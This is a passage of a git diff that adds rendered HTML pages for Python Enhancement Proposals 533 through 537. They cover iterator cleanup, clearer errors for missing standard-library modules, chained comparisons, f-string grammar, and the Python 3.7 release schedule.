  • __del__ calls self.close() (same as now), and additionally +issues a ResourceWarning if the generator wasn’t exhausted. This +warning is hidden by default, but can be enabled for those who want +to make sure they aren’t inadvertently relying on CPython-specific +GC semantics.
  • +
+

Async generator objects (including those created by async generator +comprehensions):

+
    +
  • __aiterclose__ calls self.aclose()
  • +
  • __del__ issues a RuntimeWarning if aclose has not been +called, since this probably indicates a latent bug, similar to the +“coroutine never awaited” warning.
  • +
+

QUESTION: should file objects implement __iterclose__ to close the +file? On the one hand this would make this change more disruptive; on +the other hand people really like writing for line in open(...): +..., and if we get used to iterators taking care of their own +cleanup then it might become very weird if files don’t.

+
+
+

New convenience functions

+

The operator module gains two new functions, with semantics +equivalent to the following:

+
def iterclose(it):
+    if not isinstance(it, collections.abc.Iterator):
+        raise TypeError("not an iterator")
+    if hasattr(type(it), "__iterclose__"):
+        type(it).__iterclose__(it)
+
+async def aiterclose(ait):
+    if not isinstance(it, collections.abc.AsyncIterator):
+        raise TypeError("not an iterator")
+    if hasattr(type(ait), "__aiterclose__"):
+        await type(ait).__aiterclose__(ait)
+
+
+

The itertools module gains a new iterator wrapper that can be used +to selectively disable the new __iterclose__ behavior:

+
# QUESTION: I feel like there might be a better name for this one?
+class preserve(iterable):
+    def __init__(self, iterable):
+        self._it = iter(iterable)
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        return next(self._it)
+
+    def __iterclose__(self):
+        # Swallow __iterclose__ without passing it on
+        pass
+
+
+

Example usage (assuming that file objects implements +__iterclose__):

+
with open(...) as handle:
+    # Iterate through the same file twice:
+    for line in itertools.preserve(handle):
+        ...
+    handle.seek(0)
+    for line in itertools.preserve(handle):
+        ...
+
+
+
@contextlib.contextmanager
+def iterclosing(iterable):
+    it = iter(iterable)
+    try:
+        yield preserve(it)
+    finally:
+        iterclose(it)
+
+
+
+
+

__iterclose__ implementations for iterator wrappers

+

Python ships a number of iterator types that act as wrappers around +other iterators: map, zip, itertools.accumulate, +csv.reader, and others. These iterators should define a +__iterclose__ method which calls __iterclose__ in turn on +their underlying iterators. For example, map could be implemented +as:

+
# Helper function
+map_chaining_exceptions(fn, items, last_exc=None):
+    for item in items:
+        try:
+            fn(item)
+        except BaseException as new_exc:
+            if new_exc.__context__ is None:
+                new_exc.__context__ = last_exc
+            last_exc = new_exc
+    if last_exc is not None:
+        raise last_exc
+
+class map:
+    def __init__(self, fn, *iterables):
+        self._fn = fn
+        self._iters = [iter(iterable) for iterable in iterables]
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        return self._fn(*[next(it) for it in self._iters])
+
+    def __iterclose__(self):
+        map_chaining_exceptions(operator.iterclose, self._iters)
+
+def chain(*iterables):
+    try:
+        while iterables:
+            for element in iterables.pop(0):
+                yield element
+    except BaseException as e:
+        def iterclose_iterable(iterable):
+            operations.iterclose(iter(iterable))
+        map_chaining_exceptions(iterclose_iterable, iterables, last_exc=e)
+
+
+

In some cases this requires some subtlety; for example, itertools.tee +should not call __iterclose__ on the underlying iterator until it +has been called on all of the clone iterators.

+
+
+

Example / Rationale

+

The payoff for all this is that we can now write straightforward code +like:

+
def read_newline_separated_json(path):
+    for line in open(path):
+        yield json.loads(line)
+
+
+

and be confident that the file will receive deterministic cleanup +without the end-user having to take any special effort, even in +complex cases. For example, consider this silly pipeline:

+
list(map(lambda key: key.upper(),
+         doc["key"] for doc in read_newline_separated_json(path)))
+
+
+

If our file contains a document where doc["key"] turns out to be +an integer, then the following sequence of events will happen:

+
    +
  1. key.upper() raises an AttributeError, which propagates out +of the map and triggers the implicit finally block inside +list.
  2. +
  3. The finally block in list calls __iterclose__() on the +map object.
  4. +
  5. map.__iterclose__() calls __iterclose__() on the generator +comprehension object.
  6. +
  7. This injects a GeneratorExit exception into the generator +comprehension body, which is currently suspended inside the +comprehension’s for loop body.
  8. +
  9. The exception propagates out of the for loop, triggering the +for loop’s implicit finally block, which calls +__iterclose__ on the generator object representing the call to +read_newline_separated_json.
  10. +
  11. This injects an inner GeneratorExit exception into the body of +read_newline_separated_json, currently suspended at the +yield.
  12. +
  13. The inner GeneratorExit propagates out of the for loop, +triggering the for loop’s implicit finally block, which +calls __iterclose__() on the file object.
  14. +
  15. The file object is closed.
  16. +
  17. The inner GeneratorExit resumes propagating, hits the boundary +of the generator function, and causes +read_newline_separated_json’s __iterclose__() method to +return successfully.
  18. +
  19. Control returns to the generator comprehension body, and the outer +GeneratorExit continues propagating, allowing the +comprehension’s __iterclose__() to return successfully.
  20. +
  21. The rest of the __iterclose__() calls unwind without incident, +back into the body of list.
  22. +
  23. The original AttributeError resumes propagating.
  24. +
+

(The details above assume that we implement file.__iterclose__; if +not then add a with block to read_newline_separated_json and +essentially the same logic goes through.)

+

Of course, from the user’s point of view, this can be simplified down +to just:

+

1. int.upper() raises an AttributeError +1. The file object is closed. +2. The AttributeError propagates out of list

+

So we’ve accomplished our goal of making this “just work” without the +user having to think about it.

+
+
+
+

Transition plan

+

While the majority of existing for loops will continue to produce +identical results, the proposed changes will produce +backwards-incompatible behavior in some cases. Example:

+
def read_csv_with_header(lines_iterable):
+    lines_iterator = iter(lines_iterable)
+    for line in lines_iterator:
+        column_names = line.strip().split("\t")
+        break
+    for line in lines_iterator:
+        values = line.strip().split("\t")
+        record = dict(zip(column_names, values))
+        yield record
+
+
+

This code used to be correct, but after this proposal is implemented +will require an itertools.preserve call added to the first for +loop.

+

[QUESTION: currently, if you close a generator and then try to iterate +over it then it just raises Stop(Async)Iteration, so code the +passes the same generator object to multiple for loops but forgets +to use itertools.preserve won’t see an obvious error – the second +for loop will just exit immediately. Perhaps it would be better if +iterating a closed generator raised a RuntimeError? Note that +files don’t have this problem – attempting to iterate a closed file +object already raises ValueError.]

+

Specifically, the incompatibility happens when all of these factors +come together:

+
    +
  • The automatic calling of __(a)iterclose__ is enabled
  • +
  • The iterable did not previously define __(a)iterclose__
  • +
  • The iterable does now define __(a)iterclose__
  • +
  • The iterable is re-used after the for loop exits
  • +
+

So the problem is how to manage this transition, and those are the +levers we have to work with.

+

First, observe that the only async iterables where we propose to add +__aiterclose__ are async generators, and there is currently no +existing code using async generators (though this will start changing +very soon), so the async changes do not produce any backwards +incompatibilities. (There is existing code using async iterators, but +using the new async for loop on an old async iterator is harmless, +because old async iterators don’t have __aiterclose__.) In +addition, PEP 525 was accepted on a provisional basis, and async +generators are by far the biggest beneficiary of this PEP’s proposed +changes. Therefore, I think we should strongly consider enabling +__aiterclose__ for async for loops and async generators ASAP, +ideally for 3.6.0 or 3.6.1.

+

For the non-async world, things are harder, but here’s a potential +transition path:

+

In 3.7:

+

Our goal is that existing unsafe code will start emitting warnings, +while those who want to opt-in to the future can do that immediately:

+
    +
  • We immediately add all the __iterclose__ methods described +above.
  • +
  • If from __future__ import iterclose is in effect, then for +loops and * unpacking call __iterclose__ as specified above.
  • +
  • If the future is not enabled, then for loops and * +unpacking do not call __iterclose__. But they do call some +other method instead, e.g. __iterclose_warning__.
  • +
  • Similarly, functions like list use stack introspection (!!) to +check whether their direct caller has __future__.iterclose +enabled, and use this to decide whether to call __iterclose__ or +__iterclose_warning__.
  • +
  • For all the wrapper iterators, we also add __iterclose_warning__ +methods that forward to the __iterclose_warning__ method of the +underlying iterator or iterators.
  • +
  • For generators (and files, if we decide to do that), +__iterclose_warning__ is defined to set an internal flag, and +other methods on the object are modified to check for this flag. If +they find the flag set, they issue a PendingDeprecationWarning +to inform the user that in the future this sequence would have led +to a use-after-close situation and the user should use +preserve().
  • +
+

In 3.8:

+
    +
  • Switch from PendingDeprecationWarning to DeprecationWarning
  • +
+

In 3.9:

+
    +
  • Enable the __future__ unconditionally and remove all the +__iterclose_warning__ stuff.
  • +
+

I believe that this satisfies the normal requirements for this kind of +transition – opt-in initially, with warnings targeted precisely to +the cases that will be effected, and a long deprecation cycle.

+

Probably the most controversial / risky part of this is the use of +stack introspection to make the iterable-consuming functions sensitive +to a __future__ setting, though I haven’t thought of any situation +where it would actually go wrong yet…

+
+
+

Acknowledgements

+

Thanks to Yury Selivanov, Armin Rigo, and Carl Friedrich Bolz for +helpful discussion on earlier versions of this idea.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0533.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0534/index.html b/pep-0534/index.html new file mode 100644 index 00000000000..23afd70319d --- /dev/null +++ b/pep-0534/index.html @@ -0,0 +1,481 @@ + + + + + + + + PEP 534 – Improved Errors for Missing Standard Library Modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 534 – Improved Errors for Missing Standard Library Modules

+
+
Author:
+
Tomáš Orsava <tomas.n at orsava.cz>, +Petr Viktorin <encukou at gmail.com>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
05-Sep-2016
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Python is often being built or distributed without its full standard library. +However, there is as of yet no standard, user friendly way of properly +informing the user about the failure to import such missing standard library +modules.

+

This PEP proposes a mechanism for identifying expected standard library modules +and providing more informative error messages to users when attempts to import +standard library modules fail.

+
+
+

PEP Deferral

+

The PEP authors aren’t actively working on this PEP, so if improving these +error messages is an idea that you’re interested in pursuing, please get in +touch! (e.g. by posting to the python-dev mailing list).

+

The key piece of open work is determining how to get the autoconf and Visual +Studio build processes to populate the sysconfig metadata file with the lists +of expected and optional standard library modules.

+
+
+

Motivation

+

There are several use cases for including only a subset of Python’s standard +library. However, there is so far no user-friendly mechanism for informing +the user why a stdlib module is missing and how to remedy the situation +appropriately.

+
+

CPython

+

When one of Python’s standard library modules (such as _sqlite3) cannot be +compiled during a CPython build because of missing dependencies (e.g. SQLite +header files), the module is simply skipped. If you then install this compiled +Python and use it to try to import one of the missing modules, Python will fail +with a ModuleNotFoundError.

+

For example, after deliberately removing sqlite-devel from the local +system:

+
$ ./python -c "import sqlite3"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+  File "/home/ncoghlan/devel/cpython/Lib/sqlite3/__init__.py", line 23, in <module>
+    from sqlite3.dbapi2 import *
+  File "/home/ncoghlan/devel/cpython/Lib/sqlite3/dbapi2.py", line 27, in <module>
+    from _sqlite3 import *
+ModuleNotFoundError: No module named '_sqlite3'
+
+
+

This can confuse users who may not understand why a cleanly built Python is +missing standard library modules.

+
+
+

Linux and other distributions

+

Many Linux and other distributions are already separating out parts of the +standard library to standalone packages. Among the most commonly excluded +modules are the tkinter module, since it draws in a dependency on the +graphical environment, idlelib, since it depends on tkinter (and most +Linux desktop environments provide their own default code editor), and the +test package, as it only serves to test Python internally and is about as +big as the rest of the standard library put together.

+

The methods of omission of these modules differ. For example, Debian patches +the file Lib/tkinter/__init__.py to envelop the line import _tkinter in +a try-except block and upon encountering an ImportError it simply adds +the following to the error message: please install the python3-tk package +[1]. Fedora and other distributions simply don’t include the +omitted modules, potentially leaving users baffled as to where to find them.

+

An example from Fedora 29:

+
$ python3 -c "import tkinter"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No module named 'tkinter'
+
+
+
+
+
+

Specification

+
+

APIs to list expected standard library modules

+

To allow for easier identification of which module names are expected to be +resolved in the standard library, the sysconfig module will be extended +with two additional functions:

+
    +
  • sysconfig.get_stdlib_modules(), which will provide a list of the names of +all top level Python standard library modules (including private modules)
  • +
  • sysconfig.get_optional_modules(), which will list optional public top level +standard library module names
  • +
+

The results of sysconfig.get_optional_modules() and the existing +sys.builtin_module_names will both be subsets of the full list provided by +the new sysconfig.get_stdlib_modules() function.

+

These added lists will be generated during the Python build process and saved in +the _sysconfigdata-*.py file along with other sysconfig values.

+

Possible reasons for modules being in the “optional” list will be:

+
    +
  • the module relies on an optional build dependency (e.g. _sqlite3, +tkinter, idlelib)
  • +
  • the module is private for other reasons and hence may not be present on all +implementations (e.g. _freeze_importlib, _collections_abc)
  • +
  • the module is platform specific and hence may not be present in all +installations (e.g. winreg)
  • +
  • the test package may also be freely omitted from Python runtime +installations, as it is intended for use in testing Python implementations, +not as a runtime library for Python projects to use (the public API offering +testing utilities is unittest)
  • +
+

(Note: the ensurepip, venv, and distutils modules are all considered +mandatory modules in this PEP, even though not all redistributors currently +adhere to that practice)

+
+
+

Changes to the default sys.excepthook implementation

+

The default implementation of the sys.excepthook function will then be +modified to dispense an appropriate message when it detects a failure to +import a module identified by one of the two new sysconfig functions as +belonging to the Python standard library.

+

Revised error message for a module that relies on an optional build dependency +or is otherwise considered optional when Python is installed:

+
$ ./python -c "import sqlite3"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+  File "/home/ncoghlan/devel/cpython/Lib/sqlite3/__init__.py", line 23, in <module>
+    from sqlite3.dbapi2 import *
+  File "/home/ncoghlan/devel/cpython/Lib/sqlite3/dbapi2.py", line 27, in <module>
+    from _sqlite3 import *
+ModuleNotFoundError: Optional standard library module '_sqlite3' was not found
+
+
+

Revised error message for a submodule of an optional top level package when the +entire top level package is missing:

+
$ ./python -c "import test.regrtest"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: Optional standard library module 'test' was not found
+
+
+

Revised error message for a submodule of an optional top level package when the +top level package is present:

+
$ ./python -c "import test.regrtest"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No submodule named 'test.regrtest' in optional standard library module 'test'
+
+
+

Revised error message for a module that is always expected to be available:

+
$ ./python -c "import ensurepip"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: Standard library module 'ensurepip' was not found
+
+
+

Revised error message for a missing submodule of a standard library package when +the top level package is present:

+
$ ./python -c "import encodings.mbcs"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No submodule named 'encodings.mbcs' in standard library module 'encodings'
+
+
+

These revised error messages make it clear that the missing modules are expected +to be available from the standard library, but are not available for some reason, +rather than being an indicator of a missing third party dependency in the current +environment.

+
+
+
+

Design Discussion

+
+

Modifying sys.excepthook

+

The sys.excepthook function gets called when a raised exception is uncaught +and the program is about to exit or (in an interactive session) the control is +being returned to the prompt. This makes it a perfect place for customized +error messages, as it will not influence caught errors and thus not slow down +normal execution of Python scripts.

+
+
+

Public API to query expected standard library module names

+

The inclusion of the functions sysconfig.get_stdlib_modules() and +sysconfig.get_optional_modules() will provide a long sought-after +way of easily listing the names of Python standard library modules +[2], which will (among other benefits) make it easier for +code analysis, profiling, and error reporting tools to offer runtime +--ignore-stdlib flags.

+
+
+

Only including top level module names

+

This PEP proposes that only top level module and package names be reported by +the new query APIs. This is sufficient information to generate the proposed +error messages, reduces the number of required entries by an order of magnitude, +and simplifies the process of generating the related metadata during the build +process.

+

If this is eventually found to be overly limiting, a new include_submodules +flag could be added to the query APIs. However, this is not part of the initial +proposal, as the benefits of doing so aren’t currently seen as justifying the +extra complexity.

+

There is one known consequence of this restriction, which is that the new +default excepthook implementation will report incorrect submodules names the +same way that it reports genuinely missing standard library submodules:

+
$ ./python -c "import unittest.muck"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No submodule named 'unittest.muck' in standard library module 'unittest'
+
+
+
+
+

Listing private top level module names as optional standard library modules

+

Many of the modules that have an optional external build dependency are written +as hybrid modules, where there is a shared Python wrapper around an +implementation dependent interface to the underlying external library. In other +cases, a private top level module may simply be a CPython implementation detail, +and other implementations may not provide that module at all.

+

To report import errors involving these modules appropriately, the new default +excepthook implementation needs them to be reported by the new query APIs.

+
+ +
+
+

Deferred Ideas

+

The ideas in this section are concepts that this PEP would potentially help +enable, but they’re considered out of scope for the initial proposal.

+
+

Platform dependent modules

+

Some standard library modules may be missing because they’re only provided on +particular platforms. For example, the winreg module is only available on +Windows:

+
$ python3 -c "import winreg"
+Traceback (most recent call last):
+  File "<string>", line 1, in <module>
+ModuleNotFoundError: No module named 'winreg'
+
+
+

In the current proposal, these platform dependent modules will simply be +included with all the other optional modules rather than attempting to expose +the platform dependency information in a more structured way.

+

However, the platform dependence is at least tracked at the level of “Windows”, +“Unix”, “Linux”, and “FreeBSD” for the benefit of the documentation, so it +seems plausible that it could potentially be exposed programmatically as well.

+
+
+

Emitting a warning when __main__ shadows a standard library module

+

Given the new query APIs, the new default excepthook implementation could +potentially detect when __main__.__file__ or __main__.__spec__.name +match a standard library module, and emit a suitable warning.

+

However, actually doing anything along this lines should review more cases where +uses actually encounter this problem, and the various options for potentially +offering more information to assist in debugging the situation, rather than +needing to be incorporated right now.

+
+
+
+

Recommendation for Downstream Distributors

+

By patching site.py [*] to provide their own implementation of the +sys.excepthook function, Python distributors can display tailor-made +error messages for any uncaught exceptions, including informing the user of +a proper, distro-specific way to install missing standard library modules upon +encountering a ModuleNotFoundError.

+

Some downstream distributors are already using this method of patching +sys.excepthook to integrate with platform crash reporting mechanisms.

+
+
+

Backwards Compatibility

+

No problems with backwards compatibility are expected. Distributions that are +already patching Python modules to provide custom handling of missing +dependencies can continue to do so unhindered.

+
+
+

Reference and Example Implementation

+

TBD. The finer details will depend on what’s practical given the capabilities +of the CPython build system (other implementations should then be able to use +the generated CPython data, rather than having to regenerate it themselves).

+
+
+

Notes and References

+ +

Ideas leading up to this PEP were discussed on the python-dev mailing list +and subsequently on python-ideas.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0534.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0535/index.html b/pep-0535/index.html new file mode 100644 index 00000000000..551622a49d8 --- /dev/null +++ b/pep-0535/index.html @@ -0,0 +1,303 @@ + + + + + + + + PEP 535 – Rich comparison chaining | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 535 – Rich comparison chaining

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Requires:
+
532
+
Created:
+
12-Nov-2016
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

PEP Deferral

+

Further consideration of this PEP has been deferred until Python 3.8 at the +earliest.

+
+
+

Abstract

+

Inspired by PEP 335, and building on the circuit breaking protocol described +in PEP 532, this PEP proposes a change to the definition of chained comparisons, +where the comparison chaining will be updated to use the left-associative +circuit breaking operator (else) rather than the logical disjunction +operator (and) if the left hand comparison returns a circuit breaker as +its result.

+

While there are some practical complexities arising from the current handling +of single-valued arrays in NumPy, this change should be sufficient to allow +elementwise chained comparison operations for matrices, where the result +is a matrix of boolean values, rather than raising ValueError +or tautologically returning True (indicating a non-empty matrix).

+
+
+

Relationship with other PEPs

+

This PEP has been extracted from earlier iterations of PEP 532, as a +follow-on use case for the circuit breaking protocol, rather than an essential +part of its introduction.

+

The specific proposal in this PEP to handle the element-wise comparison use +case by changing the semantic definition of comparison chaining is drawn +directly from Guido’s rejection of PEP 335.

+
+
+

Specification

+

A chained comparison like 0 < x < 10 written as:

+
LEFT_BOUND LEFT_OP EXPR RIGHT_OP RIGHT_BOUND
+
+
+

is currently roughly semantically equivalent to:

+
_expr = EXPR
+_lhs_result = LEFT_BOUND LEFT_OP _expr
+_expr_result = _lhs_result and (_expr RIGHT_OP RIGHT_BOUND)
+
+
+

Using the circuit breaking concepts introduced in PEP 532, this PEP proposes +that comparison chaining be changed to explicitly check if the left comparison +returns a circuit breaker, and if so, use else rather than and to +implement the comparison chaining:

+
_expr = EXPR
+_lhs_result = LEFT_BOUND LEFT_OP _expr
+if hasattr(type(_lhs_result), "__else__"):
+    _expr_result = _lhs_result else (_expr RIGHT_OP RIGHT_BOUND)
+else:
+    _expr_result = _lhs_result and (_expr RIGHT_OP RIGHT_BOUND)
+
+
+

This allows types like NumPy arrays to control the behaviour of chained +comparisons by returning suitably defined circuit breakers from comparison +operations.

+

The expansion of this logic to an arbitrary number of chained comparison +operations would be the same as the existing expansion for and.

+
+
+

Rationale

+

In ultimately rejecting PEP 335, Guido van Rossum noted [1]:

+
+
The NumPy folks brought up a somewhat separate issue: for them, +the most common use case is chained comparisons (e.g. A < B < C).
+

To understand this observation, we first need to look at how comparisons work +with NumPy arrays:

+
>>> import numpy as np
+>>> increasing = np.arange(5)
+>>> increasing
+array([0, 1, 2, 3, 4])
+>>> decreasing = np.arange(4, -1, -1)
+>>> decreasing
+array([4, 3, 2, 1, 0])
+>>> increasing < decreasing
+array([ True,  True, False, False, False], dtype=bool)
+
+
+

Here we see that NumPy array comparisons are element-wise by default, comparing +each element in the left hand array to the corresponding element in the right +hand array, and producing a matrix of boolean results.

+

If either side of the comparison is a scalar value, then it is broadcast across +the array and compared to each individual element:

+
>>> 0 < increasing
+array([False,  True,  True,  True,  True], dtype=bool)
+>>> increasing < 4
+array([ True,  True,  True,  True, False], dtype=bool)
+
+
+

However, this broadcasting idiom breaks down if we attempt to use chained +comparisons:

+
>>> 0 < increasing < 4
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
+
+
+

The problem is that internally, Python implicitly expands this chained +comparison into the form:

+
>>> 0 < increasing and increasing < 4
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
+
+
+

And NumPy only permits implicit coercion to a boolean value for single-element +arrays where a.any() and a.all() can be assured of having the same +result:

+
>>> np.array([False]) and np.array([False])
+array([False], dtype=bool)
+>>> np.array([False]) and np.array([True])
+array([False], dtype=bool)
+>>> np.array([True]) and np.array([False])
+array([False], dtype=bool)
+>>> np.array([True]) and np.array([True])
+array([ True], dtype=bool)
+
+
+

The proposal in this PEP would allow this situation to be changed by updating +the definition of element-wise comparison operations in NumPy to return a +dedicated subclass that implements the new circuit breaking protocol and also +changes the result array’s interpretation in a boolean context to always +return False and hence never trigger the short-circuiting behaviour:

+
class ComparisonResultArray(np.ndarray):
+    def __bool__(self):
+        # Element-wise comparison chaining never short-circuits
+        return False
+    def _raise_NotImplementedError(self):
+        msg = ("Comparison array truth values are ambiguous outside "
+               "chained comparisons. Use a.any() or a.all()")
+        raise NotImplementedError(msg)
+    def __not__(self):
+        self._raise_NotImplementedError()
+    def __then__(self, result):
+        self._raise_NotImplementedError()
+    def __else__(self, result):
+        return np.logical_and(self, other.view(ComparisonResultArray))
+
+
+

With this change, the chained comparison example above would be able to return:

+
>>> 0 < increasing < 4
+ComparisonResultArray([ False,  True,  True,  True, False], dtype=bool)
+
+
+
+
+

Implementation

+

Actual implementation has been deferred pending in-principle interest in the +idea of making the changes proposed in PEP 532.

+

…TBD…

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0535.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0536/index.html b/pep-0536/index.html new file mode 100644 index 00000000000..53a1934533f --- /dev/null +++ b/pep-0536/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 536 – Final Grammar for Literal String Interpolation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 536 – Final Grammar for Literal String Interpolation

+
+
Author:
+
Philipp Angerer <phil.angerer at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
11-Dec-2016
+
Python-Version:
+
3.7
+
Post-History:
+
18-Aug-2016, +23-Dec-2016, +15-Mar-2019
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 498 introduced Literal String Interpolation (or “f-strings”). +The expression portions of those literals however are subject to +certain restrictions. This PEP proposes a formal grammar lifting +those restrictions, promoting “f-strings” to “f expressions” or f-literals.

+

This PEP expands upon the f-strings introduced by PEP 498, +so this text requires familiarity with PEP 498.

+
+
+

PEP Withdrawal

+

This PEP has been withdrawn in favour of PEP 701. +PEP 701 addresses all important points of this PEP.

+
+
+

Terminology

+

This text will refer to the existing grammar as “f-strings”, +and the proposed one as “f-literals”.

+

Furthermore, it will refer to the {}-delimited expressions in +f-literals/f-strings as “expression portions” and the static string content +around them as “string portions”.

+
+
+

Motivation

+

The current implementation of f-strings in CPython relies on the existing +string parsing machinery and a post processing of its tokens. This results in +several restrictions to the possible expressions usable within f-strings:

+
    +
  1. It is impossible to use the quote character delimiting the f-string +within the expression portion:
    >>> f'Magic wand: { bag['wand'] }'
    +                             ^
    +SyntaxError: invalid syntax
    +
    +
    +
  2. +
  3. A previously considered way around it would lead to escape sequences +in executed code and is prohibited in f-strings:
    >>> f'Magic wand { bag[\'wand\'] } string'
    +SyntaxError: f-string expression portion cannot include a backslash
    +
    +
    +
  4. +
  5. Comments are forbidden even in multi-line f-strings:
    >>> f'''A complex trick: {
    +... bag['bag']  # recursive bags!
    +... }'''
    +SyntaxError: f-string expression part cannot include '#'
    +
    +
    +
  6. +
  7. Expression portions need to wrap ':' and '!' in braces:
    >>> f'Useless use of lambdas: { lambda x: x*2 }'
    +SyntaxError: unexpected EOF while parsing
    +
    +
    +
  8. +
+

These limitations serve no purpose from a language user perspective and +can be lifted by giving f-literals a regular grammar without exceptions +and implementing it using dedicated parse code.

+
+
+

Rationale

+

The restrictions mentioned in Motivation are non-obvious and counter-intuitive +unless the user is familiar with the f-literals’ implementation details.

+

As mentioned, a previous version of PEP 498 allowed escape sequences +anywhere in f-strings, including as ways to encode the braces delimiting +the expression portions and in their code. They would be expanded before +the code is parsed, which would have had several important ramifications:

+

#. It would not be clear to human readers which portions are Expressions +and which are strings. Great material for an “obfuscated/underhanded +Python challenge” +#. Syntax highlighters are good in parsing nested grammar, but not +in recognizing escape sequences. ECMAScript 2016 (JavaScript) allows +escape sequences in its identifiers [1] and the author knows of no +syntax highlighter able to correctly highlight code making use of this.

+

As a consequence, the expression portions would be harder to recognize +with and without the aid of syntax highlighting. With the new grammar, +it is easy to extend syntax highlighters to correctly parse +and display f-literals:

+
f'Magic wand: {bag['wand']:^10}'

Highlighting expression portions with possible escape sequences would +mean to create a modified copy of all rules of the complete expression +grammar, accounting for the possibility of escape sequences in key words, +delimiters, and all other language syntax. One such duplication would +yield one level of escaping depth and have to be repeated for a deeper +escaping in a recursive f-literal. This is the case since no highlighting +engine known to the author supports expanding escape sequences before +applying rules to a certain context. Nesting contexts however is a +standard feature of all highlighting engines.

+

Familiarity also plays a role: Arbitrary nesting of expressions +without expansion of escape sequences is available in every single +other language employing a string interpolation method that uses +expressions instead of just variable names. [2]

+
+
+

Specification

+

PEP 498 specified f-strings as the following, but places restrictions on it:

+
f ' <text> { <expression> <optional !s, !r, or !a> <optional : format specifier> } <text> ... '
+
+
+

All restrictions mentioned in the PEP are lifted from f-literals, +as explained below:

+
    +
  1. Expression portions may now contain strings delimited with the same +kind of quote that is used to delimit the f-literal.
  2. +
  3. Backslashes may now appear within expressions just like anywhere else +in Python code. In case of strings nested within f-literals, +escape sequences are expanded when the innermost string is evaluated.
  4. +
  5. Comments, using the '#' character, are possible only in multi-line +f-literals, since comments are terminated by the end of the line +(which makes closing a single-line f-literal impossible).
  6. +
  7. Expression portions may contain ':' or '!' wherever +syntactically valid. The first ':' or '!' that is not part +of an expression has to be followed a valid coercion or format specifier.
  8. +
+

A remaining restriction not explicitly mentioned by PEP 498 is line breaks +in expression portions. Since strings delimited by single ' or " +characters are expected to be single line, line breaks remain illegal +in expression portions of single line strings.

+
+

Note

+

Is lifting of the restrictions sufficient, +or should we specify a more complete grammar?

+
+
+
+

Backwards Compatibility

+

f-literals are fully backwards compatible to f-strings, +and expands the syntax considered legal.

+
+
+

Reference Implementation

+

TBD

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0536.rst

+

Last modified: 2023-10-26 09:35:14 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0537/index.html b/pep-0537/index.html new file mode 100644 index 00000000000..2c78c750497 --- /dev/null +++ b/pep-0537/index.html @@ -0,0 +1,364 @@ + + + + + + + + PEP 537 – Python 3.7 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 537 – Python 3.7 Release Schedule

+
+
Author:
+
Ned Deily <nad at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
23-Dec-2016
+
Python-Version:
+
3.7
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.7. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.7 Release Manager: Ned Deily
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

3.7 Lifespan

+

3.7 will receive bugfix updates +approximately every 3 months for about 24 months. Sometime after the release of +3.8.0 final, a final 3.7 bugfix update will be released. +After that, it is expected that +security updates +(source only) will be released as needed until 5 years after +the release of 3.7 final, so until approximately 2023-06.

+

